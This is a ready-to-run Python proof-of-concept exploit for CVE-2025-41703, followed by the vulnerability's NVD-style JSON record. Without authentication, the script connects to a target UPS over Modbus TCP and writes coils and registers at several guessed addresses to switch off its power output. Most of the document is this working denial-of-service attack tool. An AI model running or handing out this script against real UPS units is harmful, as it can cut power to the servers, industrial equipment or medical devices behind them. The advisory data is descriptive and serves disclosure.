CVE-2025-41703

#!/usr/bin/env python3 # CVE-2025-41703 - UPS Modbus Denial of Service PoC # This PoC demonstrates how an unauthenticated attacker can # turn off the output of a UPS via Modbus TCP command. from pymodbus.client import ModbusTcpClient import sys import argparse def exploit_ups_modbus(target_host, target_port=502): """ Send Modbus command to turn off UPS output. Uses Write Single Coil (function code 05) to control the output relay. """ try: # Connect to the target UPS Modbus TCP service client = ModbusTcpClient(target_host, port=target_port, timeout=5) connection = client.connect() if not connection: print(f"[-] Failed to connect to {target_host}:{target_port}") return False print(f"[+] Connected to UPS Modbus service at {target_host}:{target_port}") # Common UPS Modbus registers for output control # Register address may vary by manufacturer output_control_registers = [ 0x0001, # Common output control register 0x0010, # Alternative output control register 0x0100, # Some UPS models 0x0002, # Output enable/disable register ] for register_addr in output_control_registers: try: # Write Single Coil - turn off output (value = 0x0000) # Coil OFF = 0x0000, Coil ON = 0xFF00 response = client.write_coil( address=register_addr, value=False, # False = turn off output slave=1 # Default slave ID for UPS ) if response and not response.isError(): print(f"[+] Successfully sent OFF command to register {hex(register_addr)}") print(f"[+] UPS output has been disabled!") return True except Exception as e: print(f"[-] Register {hex(register_addr)} failed: {e}") continue # Alternative: Try Write Single Register approach for register_addr in output_control_registers: try: # Write 0 to output control register response = client.write_register( address=register_addr, value=0, # 0 = turn off slave=1 ) if response and not response.isError(): print(f"[+] Successfully wrote 0 to register {hex(register_addr)}") print(f"[+] UPS output has been disabled!") return True except Exception as e: print(f"[-] Register {hex(register_addr)} failed: {e}") continue client.close() return False except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-41703 UPS Modbus DoS PoC') parser.add_argument('target', help='Target UPS IP address') parser.add_argument('-p', '--port', type=int, default=502, help='Modbus TCP port (default: 502)') args = parser.parse_args() print(f"[*] CVE-2025-41703 - UPS Modbus Denial of Service PoC") print(f"[*] Target: {args.target}:{args.port}") print(f"[*] WARNING: This will turn off the UPS output!") print() success = exploit_ups_modbus(args.target, args.port) if success: print("[!] Exploit completed successfully - UPS output is OFF") sys.exit(0) else: print("[-] Exploit failed - target may not be vulnerable or uses different register mapping") sys.exit(1)

{"cve": {"id": "CVE-2025-41703", "sourceIdentifier": "[email protected]", "published": "2025-10-14T08:15:34.763", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unauthenticated remote attacker can cause a Denial of Service by turning off the output of the UPS via Modbus command."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://certvde.com/de/advisories/VDE-2025-072", "source": "[email protected]"}, {"url": "http://seclists.org/fulldisclosure/2025/Oct/12", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}